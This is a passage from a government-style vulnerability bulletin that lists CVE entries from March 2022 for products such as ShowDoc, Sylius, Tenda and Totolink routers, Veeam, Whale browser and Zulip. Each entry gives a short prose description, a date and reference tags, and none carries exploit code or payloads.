star7th -- showdocFile Upload Restriction Bypass leading to Stored XSS Vulnerability in GitHub repository star7th/showdoc prior to 2.10.4.2022-03-15not yet calculatedCVE-2022-0951
MISC
CONFIRM
star7th -- showdocStored XSS viva axd and cshtml file upload in star7th/showdoc in GitHub repository star7th/showdoc prior to v2.10.4.2022-03-15not yet calculatedCVE-2022-0945
CONFIRM
MISC
star7th -- showdocStored XSS viva .properties file upload in GitHub repository star7th/showdoc prior to 2.10.4.2022-03-14not yet calculatedCVE-2022-0960
CONFIRM
MISC
star7th -- showdocStored XSS via File Upload in star7th/showdoc in GitHub repository star7th/showdoc prior to 2.4.10.2022-03-15not yet calculatedCVE-2022-0966
MISC
CONFIRM
star7th -- showdoc
 
Stored XSS viva .webma file upload in GitHub repository star7th/showdoc prior to 2.10.4.2022-03-14not yet calculatedCVE-2022-0962
MISC
CONFIRM
star7th -- showdoc
 
Stored XSS due to Unrestricted File Upload in GitHub repository star7th/showdoc prior to 2.10.4.2022-03-15not yet calculatedCVE-2022-0942
MISC
CONFIRM
stb_trutype.h -- stb_trutype.hstb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function stbtt__find_table at stb_truetype.h.2022-03-17not yet calculatedCVE-2022-25516
MISC
stb_trutype.h -- stb_trutype.hstb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function ttULONG() at stb_truetype.h.2022-03-17not yet calculatedCVE-2022-25515
MISC
stb_trutype.h -- stb_trutype.h
 
stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function ttUSHORT() at stb_truetype.h.2022-03-17not yet calculatedCVE-2022-25514
MISC
stormshield -- network_security
 
In Stormshield Network Security (SNS) before 3.7.25, 3.8.x through 3.11.x before 3.11.13, 4.x before 4.2.10, and 4.3.x before 4.3.5, a flood of connections to the SSLVPN service might lead to saturation of the loopback interface. This could result in the blocking of almost all network traffic, making the firewall unreachable. An attacker could exploit this via forged and properly timed traffic to cause a denial of service.2022-03-15not yet calculatedCVE-2022-23989
MISC
suse -- linux_enterprise_server
 
A Insecure Temporary File vulnerability in grub-once of grub2 in SUSE Linux Enterprise Server 15 SP4, openSUSE Factory allows local attackers to truncate arbitrary files. This issue affects: SUSE Linux Enterprise Server 15 SP4 grub2 versions prior to 2.06-150400.7.1. SUSE openSUSE Factory grub2 versions prior to 2.06-18.1.2022-03-16not yet calculatedCVE-2021-46705
CONFIRM
sylius -- syliusSylius is an open source eCommerce platform. Prior to versions 1.10.11 and 1.11.2, the reset password token was not set to null after the password was changed. The same token could be used several times, which could result in leak of the existing token and unauthorized password change. The issue is fixed in versions 1.10.11 and 1.11.2. As a workaround, overwrite the `Sylius\Bundle\ApiBundle\CommandHandler\ResetPasswordHandler` class with code provided by the maintainers and register it in a container. More information about this workaround is available in the GitHub Security Advisory.2022-03-14not yet calculatedCVE-2022-24743
MISC
CONFIRM
MISC
sylius -- syliusSylius is an open source eCommerce platform. In versions prior to 1.9.10, 1.10.11, and 1.11.2, it is possible to upload an SVG file containing cross-site scripting (XSS) code in the admin panel. In order to perform a XSS attack, the file itself has to be open in a new card or loaded outside of the IMG tag. The problem applies both to the files opened on the admin panel and shop pages. The issue is fixed in versions 1.9.10, 1.10.11, and 1.11.2. As a workaround, require a library that adds on-upload file sanitization and overwrite the service before writing the file to the filesystem. The GitHub Security Advisory contains more specific information about the workaround.2022-03-14not yet calculatedCVE-2022-24749
CONFIRM
MISC
MISC
MISC
sylius -- sylius
 
Sylius is an open source eCommerce platform. Prior to versions 1.9.10, 1.10.11, and 1.11.2, it is possible for a page controlled by an attacker to load the website within an iframe. This will enable a clickjacking attack, in which the attacker's page overlays the target application's interface with a different interface provided by the attacker. The issue is fixed in versions 1.9.10, 1.10.11, and 1.11.2. A workaround is available. Every response from app should have an X-Frame-Options header set to: ``sameorigin``. To achieve that, add a new `subscriber` in the app.2022-03-14not yet calculatedCVE-2022-24733
CONFIRM
MISC
MISC
MISC
sylius -- sylius
 
Sylius is an open source eCommerce platform. Prior to versions 1.9.10, 1.10.11, and 1.11.2, any other user can view the data if browser tab remains unclosed after log out. The issue is fixed in versions 1.9.10, 1.10.11, and 1.11.2. A workaround is available. The application must strictly redirect to login page even browser back button is pressed. Another possibility is to set more strict cache policies for restricted content.2022-03-14not yet calculatedCVE-2022-24742
MISC
CONFIRM
MISC
MISC
sylius -- sylius
 
SyliusGridBundle is a package of generic data grids for Symfony applications. Prior to versions 1.10.1 and 1.11-rc2, values added at the end of query sorting were passed directly to the database. The maintainers do not know if this could lead to direct SQL injections but took steps to remediate the vulnerability. The issue is fixed in versions 1.10.1 and 1.11-rc2. As a workaround, overwrite the`Sylius\Component\Grid\Sorting\Sorter.php` class and register it in the container. More information about this workaround is available in the GitHub Security Advisory.2022-03-15not yet calculatedCVE-2022-24752
MISC
CONFIRM
MISC
MISC
MISC
syltek -- syltek
 
Syltek application before its 10.22.00 version, does not correctly check that a product ID has a valid payment associated to it. This could allow an attacker to forge a request and bypass the payment system by marking items as payed without any verification.2022-03-18not yet calculatedCVE-2021-4031
CONFIRM
sync_qcloud_cos -- sync_qcloud_cos
 
The Sync QCloud COS WordPress plugin before 2.0.1 does not escape some of its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed2022-03-14not yet calculatedCVE-2022-0659
MISC
sysend.js -- sysend.js
 
sysend.js is a library that allows a user to send messages between pages that are open in the same browser. Users that use cross-origin communication may have their communications intercepted. Impact is limited by the communication occurring in the same browser. This issue has been patched in sysend.js version 1.10.0. The only currently known workaround is to avoid sending communications that a user does not want to have intercepted via sysend messages.2022-03-14not yet calculatedCVE-2022-24762
CONFIRM
MISC
MISC
MISC
taocms -- taocms
 
taocms v3.0.2 allows attackers to execute code injection via arbitrarily editing the .htaccess file.2022-03-18not yet calculatedCVE-2022-25578
MISC
MISC
team_circle_image_slider_with_lightbox -- team_circle_image_slider_with_lightbox
 
The Team Circle Image Slider With Lightbox WordPress plugin before 1.0.16 does not sanitize and escape the order_pos parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting.2022-03-14not yet calculatedCVE-2022-0648
MISC
tenda -- routersTenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the deviceId parameter in the saveparentcontrolinfo function.2022-03-18not yet calculatedCVE-2022-25428
MISC
tenda -- routersTenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the schedendtime parameter in the openSchedWifi function.2022-03-18not yet calculatedCVE-2022-25427
MISC
tenda -- routersTenda AC9 v15.03.2.21 was discovered to contain a buffer overflow via the time parameter in the saveparentcontrolinfo function.2022-03-18not yet calculatedCVE-2022-25429
MISC
tenda -- routersTenda AC9 v15.03.2.21 was discovered to contain multiple stack overflows via the NPTR, V12, V10 and V11 parameter in the Formsetqosband function.2022-03-18not yet calculatedCVE-2022-25431
MISC
tenda -- routersTenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the urls parameter in the saveparentcontrolinfo function.2022-03-18not yet calculatedCVE-2022-25433
MISC
tenda -- routersTenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the firewallen parameter in the SetFirewallCfg function.2022-03-18not yet calculatedCVE-2022-25434
MISC
tenda -- routersTenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the list parameter in the SetVirtualServerCfg function.2022-03-18not yet calculatedCVE-2022-25437
MISC
tenda -- routersTenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the list parameter in the SetStaticRoutecfg function.2022-03-18not yet calculatedCVE-2022-25435
MISC
tenda -- routersTenda AC9 v15.03.2.21 was discovered to contain a remote command execution (RCE) vulnerability via the SetIPTVCfg function.2022-03-18not yet calculatedCVE-2022-25438
MISC
tenda -- routersTenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the list parameter in the SetIpMacBind function.2022-03-18not yet calculatedCVE-2022-25455
MISC
tenda -- routersTenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the schedstarttime parameter in the openSchedWifi function.2022-03-18not yet calculatedCVE-2022-25446
MISC
tenda -- routersTenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the day parameter in the openSchedWifi function.2022-03-18not yet calculatedCVE-2022-25448
MISC
tenda -- routersTenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the deviceId parameter in the saveParentControlInfo function.2022-03-18not yet calculatedCVE-2022-25449
MISC
tenda -- routersTenda AC6 V15.03.05.09_multi was discovered to contain a stack overflow via the list parameter in the SetVirtualServerCfg function.2022-03-18not yet calculatedCVE-2022-25450
MISC
tenda -- routersTenda AC6 V15.03.05.09_multi was discovered to contain a stack overflow via the list parameter in the setstaticroutecfg function.2022-03-18not yet calculatedCVE-2022-25451
MISC
tenda -- routersTenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the URLs parameter in the saveParentControlInfo function.2022-03-18not yet calculatedCVE-2022-25452
MISC
tenda -- routersTenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the time parameter in the saveParentControlInfo function.2022-03-18not yet calculatedCVE-2022-25453
MISC
tenda -- routersTenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the loginpwd parameter in the SetFirewallCfg function.2022-03-18not yet calculatedCVE-2022-25454
MISC
tenda -- routersTenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the security_5g parameter in the WifiBasicSet function.2022-03-18not yet calculatedCVE-2022-25456
MISC
tenda -- routersTenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the list parameter in the SetIpMacBind function.2022-03-18not yet calculatedCVE-2022-25439
MISC
tenda -- routersTenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the time parameter in the PowerSaveSet function.2022-03-18not yet calculatedCVE-2022-25445
MISC
tenda -- routersTenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the ntpserver parameter in the SetSysTimeCfg function.2022-03-18not yet calculatedCVE-2022-25457
MISC
tenda -- routersTenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the cmdinput parameter in the exeCommand function.2022-03-18not yet calculatedCVE-2022-25458
MISC
tenda -- routersTenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the S1 parameter in the SetSysTimeCfg function.2022-03-18not yet calculatedCVE-2022-25459
MISC
tenda -- routersTenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the endip parameter in the SetPptpServerCfg function.2022-03-18not yet calculatedCVE-2022-25460
MISC
tenda -- routersTenda AC9 v15.03.2.21 was discovered to contain a remote command execution (RCE) vulnerability via the vlanid parameter in the SetIPTVCfg function.2022-03-18not yet calculatedCVE-2022-25441
MISC
tenda -- routersTenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the ntpserver parameter in the SetSysTimeCfg function.2022-03-18not yet calculatedCVE-2022-25440
MISC
tenda -- routersTenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the schedendtime parameter in the openSchedWifi function.2022-03-18not yet calculatedCVE-2022-25447
MISC
tenda -- routers
 
Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the startip parameter in the SetPptpServerCfg function.2022-03-18not yet calculatedCVE-2022-25461
MISC
tibco -- multiple_products
 
The Server component of TIBCO Software Inc.'s TIBCO JasperReports Library, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server for AWS Marketplace, TIBCO JasperReports Server for ActiveMatrix BPM, and TIBCO JasperReports Server for Microsoft Azure contains a directory-traversal vulnerability that may theoretically allow web server users to access contents of the host system. Affected releases are TIBCO Software Inc.'s TIBCO JasperReports Library: version 7.9.0, TIBCO JasperReports Library for ActiveMatrix BPM: version 7.9.0, TIBCO JasperReports Server: versions 7.9.0 and 7.9.1, TIBCO JasperReports Server for AWS Marketplace: versions 7.9.0 and 7.9.1, TIBCO JasperReports Server for ActiveMatrix BPM: versions 7.9.0 and 7.9.1, and TIBCO JasperReports Server for Microsoft Azure: version 7.9.1.2022-03-15not yet calculatedCVE-2022-22771
CONFIRM
CONFIRM
tiny_file_manager -- tiny_file_manager
 
A path traversal vulnerability in the file upload functionality in tinyfilemanager.php in Tiny File Manager before 2.4.7 allows remote attackers (with valid user accounts) to upload malicious PHP files to the webroot, leading to code execution.2022-03-15not yet calculatedCVE-2021-45010
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
tinyfilemanager -- tinyfilemanager
 
Path Traversal in GitHub repository prasathmani/tinyfilemanager prior to 2.4.7.2022-03-17not yet calculatedCVE-2022-1000
MISC
CONFIRM
totlink -- routers
 
Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function NTPSyncWithHost. This vulnerability allows attackers to execute arbitrary commands via the host_time parameter.2022-03-15not yet calculatedCVE-2022-26214
MISC
totolink -- firmware
 
Totolink X5000R_Firmware v9.1.0u.6118_B20201102 was discovered to contain a command injection vulnerability in the function setNtpCfg, via the tz parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-26213
MISC
totolink -- routersTotolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setUploadSetting, via the FileName parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-26209
MISC
totolink -- routersTotolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setDiagnosisCfg, via the ipDoamin parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-26207
MISC
totolink -- routersTotolink routers s X5000R V9.1.0u.6118_B20201102 and A7000R V9.1.0u.6115_B20201022 were discovered to contain a command injection vulnerability in the Tunnel 6rd function via the relay6rd parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-27003
MISC
totolink -- routersTotolink routers s X5000R V9.1.0u.6118_B20201102 and A7000R V9.1.0u.6115_B20201022 were discovered to contain a command injection vulnerability in the Tunnel 6in4 function via the remote6in4 parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-27004
MISC
totolink -- routersTotolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function CloudACMunualUpdate, via the deviceMac and deviceName parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-26211
MISC
totolink -- routersTotolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setLanguageCfg, via the langType parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-26206
MISC
totolink -- routersTotolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setWebWlanIdx, via the webWlanIdx parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-26208
MISC
totolink -- routersTotolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setUpgradeFW, via the FileName parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-26210
MISC
totolink -- routers
 
Totolink routers s X5000R V9.1.0u.6118_B20201102 and A7000R V9.1.0u.6115_B20201022 were discovered to contain a command injection vulnerability in the setWanCfg function via the hostName parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-27005
MISC
totolink -- routers
 
Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setDeviceName, via the deviceMac and deviceName parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request.2022-03-15not yet calculatedCVE-2022-26212
MISC
unisoc -- chipset
 
The UNISOC chipset through 2022-03-15 allows attackers to obtain remote control of a mobile phone, e.g., to obtain sensitive information from text messages or the device's screen, record video of the device's physical environment, or modify data.2022-03-18not yet calculatedCVE-2022-27250
MISC
veeam -- agent_for_windows
 
Deserialization of untrusted data in Veeam Agent for Windows 2.0, 2.1, 2.2, 3.0.2, 4.x, and 5.x allows local users to run arbitrary code with local system privileges.2022-03-17not yet calculatedCVE-2022-26503
MISC
MISC
veeam -- backup_and_replication**REJECT** Veeam Backup & Replication 10.x and 11.x has an Untrusted Search Path.2022-03-18not yet calculatedCVE-2022-26502
veeam -- backup_and_replicationVeeam Backup & Replication 10.x and 11.x has Incorrect Access Control (issue 1 of 2).2022-03-17not yet calculatedCVE-2022-26501
MISC
MISC
veeam -- backup_and_replicationImproper limitation of path names in Veeam Backup & Replication 9.5U3, 9.5U4,10.x, and 11.x allows remote authenticated users access to internal API functions that allows attackers to upload and execute arbitrary code.2022-03-17not yet calculatedCVE-2022-26500
MISC
MISC
veeam -- backup_and_replication
 
Improper authentication in Veeam Backup & Replication 9.5U3, 9.5U4,10.x and 11.x component used for Microsoft System Center Virtual Machine Manager (SCVMM) allows attackers execute arbitrary code via Veeam.Backup.PSManager.exe2022-03-17not yet calculatedCVE-2022-26504
MISC
MISC
vim -- vim
 
Heap-based Buffer Overflow occurs in vim in GitHub repository vim/vim prior to 8.2.4563.2022-03-14not yet calculatedCVE-2022-0943
MISC
CONFIRM
volto -- volto
 
Volto is a ReactJS-based frontend for the Plone Content Management System. Between versions 14.0.0-alpha.5 and 15.0.0-alpha.0, a user could have their authentication cookie replaced with an authentication cookie from another user, effectively giving them control of the other user's account and privileges. This occurs when using an outdated version of the `react-cookie` library and a server is under high load. A proof of concept does not currently exist, but it is possible for this issue to occur in the wild. The patch and fix is present in Volto 15.0.0-alpha.0. As a workaround, one may manually upgrade the `react-cookie` package to 4.1.1 and then override all Volto components that use this library.2022-03-14not yet calculatedCVE-2022-24740
CONFIRM
MISC
voting_contest -- voting_contest
 
The WP Voting Contest WordPress plugin through 2.1 does not sanitise and escape the post_id parameter before outputting it back in the response via the wpvc_social_share_icons AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting issue2022-03-14not yet calculatedCVE-2022-0321
MISC
waitress -- waitress
 
Waitress is a Web Server Gateway Interface server for Python 2 and 3. When using Waitress versions 2.1.0 and prior behind a proxy that does not properly validate the incoming HTTP request matches the RFC7230 standard, Waitress and the frontend proxy may disagree on where one request starts and where it ends. This would allow requests to be smuggled via the front-end proxy to waitress and later behavior. There are two classes of vulnerability that may lead to request smuggling that are addressed by this advisory: The use of Python's `int()` to parse strings into integers, leading to `+10` to be parsed as `10`, or `0x01` to be parsed as `1`, where as the standard specifies that the string should contain only digits or hex digits; and Waitress does not support chunk extensions, however it was discarding them without validating that they did not contain illegal characters. This vulnerability has been patched in Waitress 2.1.1. A workaround is available. When deploying a proxy in front of waitress, turning on any and all functionality to make sure that the request matches the RFC7230 standard. Certain proxy servers may not have this functionality though and users are encouraged to upgrade to the latest version of waitress instead.2022-03-17not yet calculatedCVE-2022-24761
MISC
CONFIRM
MISC
wavlink -- routersA vulnerability is in the 'live_mfg.html' page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, which can allow a remote attacker to access this page without any authentication. When processed, it exposes some key information of the manager of router.2022-03-17not yet calculatedCVE-2021-44260
MISC
wavlink -- routers
 
A vulnerability is in the 'wx.html' page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, which can allow a remote attacker to access this page without any authentication. When an unauthorized user accesses this page directly, it connects to this device as a friend of the device owner.2022-03-17not yet calculatedCVE-2021-44259
MISC
whale_browser -- whale_browserWhale Bridge, a default extension in Whale browser before 3.12.129.18, allowed to receive any SendMessage request from the content script itself that could lead to controlling Whale Bridge if the rendering process compromises.2022-03-17not yet calculatedCVE-2022-24074
CONFIRM
whale_browser -- whale_browserWhale browser before 3.12.129.18 allowed extensions to replace JavaScript files of the HWP viewer website which could access to local HWP files. When the HWP files were opened, the replaced script could read the files.2022-03-17not yet calculatedCVE-2022-24075
CONFIRM
whale_browser -- whale_browser
 
The devtools API in Whale browser before 3.12.129.18 allowed extension developers to inject arbitrary JavaScript into the extension store web page via devtools.inspectedWindow, leading to extensions downloading and uploading when users open the developer tool.2022-03-17not yet calculatedCVE-2022-24072
CONFIRM
whale_browser -- whale_browser
 
The Web Request API in Whale browser before 3.12.129.18 allowed to deny access to the extension store or redirect to any URL when users access the store.2022-03-17not yet calculatedCVE-2022-24073
CONFIRM
wireapp -- wire-server
 
wire-server provides back end services for Wire, an open source messenger. In versions of wire-server prior to the 2022-01-27 release, it was possible to craft DSA Signatures to bypass SAML SSO and impersonate any Wire user with SAML credentials. In teams with SAML, but without SCIM, it was possible to create new accounts with fake SAML credentials. Under certain conditions that can be established by an attacker, an upstream library for parsing, rendering, signing, and validating SAML XML data was accepting public keys as trusted that were provided by the attacker in the signature. As a consequence, the attacker could login as any user in any Wire team with SAML SSO enabled. If SCIM was not enabled, the attacker could also create new users with new SAML NameIDs. In order to exploit this vulnerability, the attacker needs to know the SSO login code (distributed to all team members with SAML credentials and visible in the Team Management app), the SAML EntityID identifying the IdP (a URL not considered sensitive, but usually hard to guess, also visible in Team Management), and the SAML NameID of the user (usually an email address or a nick). The issue has been fixed in wire-server `2022-01-27` and is already deployed on all Wire managed services. On premise instances of wire-server need to be updated to `2022-01-27`, so that their backends are no longer affected. There are currently no known workarounds. More detailed information about how to reproduce the vulnerability and mitigation strategies is available in the GitHub Security Advisory.2022-03-16not yet calculatedCVE-2022-23610
MISC
CONFIRM
wp-downloadmanager -- wp-downloadmanager
 
Authenticated Reflected Cross-Site Scripting (XSS) vulnerability discovered in WP-DownloadManager WordPress plugin (versions <= 1.68.6).2022-03-18not yet calculatedCVE-2021-44760
CONFIRM
CONFIRM
wp-downloadmanager -- wp-downloadmanager
 
Multiple Authenticated Stored Cross-Site Scripting (XSS) vulnerabilities discovered in WP-DownloadManager WordPress plugin (versions <= 1.68.6). Vvulnerable parameters &download_path, &download_path_url, &download_page_url.2022-03-18not yet calculatedCVE-2022-25605
CONFIRM
CONFIRM
wp_home_page_menu -- qp_home_page_menu
 
The WP Home Page Menu WordPress plugin before 3.1 does not sanitise and escape its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed2022-03-14not yet calculatedCVE-2022-0684
MISC
CONFIRM
wps_office_version -- wps_office_versionThe installer of WPS Office Version 10.8.0.6186 insecurely load VERSION.DLL (or some other DLLs), allowing an attacker to execute arbitrary code with the privilege of the user invoking the installer.2022-03-17not yet calculatedCVE-2022-25969
JVN
CONFIRM
wps_office_version -- wps_office_version
 
The installer of WPS Office Version 10.8.0.5745 insecurely load shcore.dll, allowing an attacker to execute arbitrary code with the privilege of the user invoking the installer.2022-03-17not yet calculatedCVE-2022-26081
JVN
CONFIRM
wps_presentation -- wps_presentation
 
WPS Presentation 11.8.0.5745 insecurely load d3dx9_41.dll when opening .pps files('current directory type' DLL loading).2022-03-17not yet calculatedCVE-2022-26511
JVN
CONFIRM
x2crm -- x2crm
 
A Cross-Site Scripting (XSS) attack can cause arbitrary code (javascript) to run in a user’s browser while the browser is connected to a trusted website. As the vehicle for the attack, the application targets the users and not the application itself. Additionally, the XSS payload is executed when the user attempts to access any page of the CRM.2022-03-16not yet calculatedCVE-2021-33853
MISC
xbit -- xbitA cross-site scripting vulnerability is present in Xbtit 3.1. The stored XSS vulnerability occurs because /ajaxchat/sendChatData.php does not properly validate the value of the "n" (POST) parameter. Through this vulnerability, an attacker is capable to execute malicious JavaScript code.2022-03-16not yet calculatedCVE-2021-45822
MISC
MISC
MISC
xbit -- xbit
 
A blind SQL injection vulnerability exists in Xbtit 3.1 via the sid parameter in ajaxchat/getHistoryChatData.php file that is accessible by a registered user. As a result, a malicious user can extract sensitive data such as usernames and passwords and in some cases use this vulnerability in order to get a remote code execution on the remote web server.2022-03-16not yet calculatedCVE-2021-45821
MISC
MISC
MISC
xebd -- accel-ppp
 
The telnet_input_char function in opt/src/accel-pppd/cli/telnet.c suffers from a memory corruption vulnerability, whereby user input cmdline_len is copied into a fixed buffer b->buf without any bound checks. If the server connects with a malicious client, crafted client requests can remotely trigger this vulnerability.2022-03-16not yet calculatedCVE-2022-0982
MISC
yokogawa -- widefield3
 
In Yokogawa WideField3 R1.01 - R4.03, a buffer overflow could be caused when a user loads a maliciously crafted project file.2022-03-18not yet calculatedCVE-2020-16232
CONFIRM
CONFIRM
zero_spam -- zero_spam
 
The WordPress Zero Spam WordPress plugin before 5.2.11 does not properly sanitise and escape the order and orderby parameters before using them in a SQL statement in the admin dashboard, leading to a SQL injection2022-03-14not yet calculatedCVE-2022-0254
CONFIRM
MISC
CONFIRM
zulip -- zulip
 
Zulip is an open source group chat application. Starting with version 4.0 and prior to version 4.11, Zulip is vulnerable to a race condition during account deactivation, where a simultaneous access by the user being deactivated may, in rare cases, allow continued access by the deactivated user. A patch is available in version 4.11 on the 4.x branch and version 5.0-rc1 on the 5.x branch. Upgrading to a fixed version will, as a side effect, deactivate any cached sessions that may have been leaked through this bug. There are currently no known workarounds.2022-03-16not yet calculatedCVE-2022-24751
MISC
MISC
CONFIRM

Back to top

Please share your thoughts

We recently updated our anonymous product survey; we’d welcome your feedback.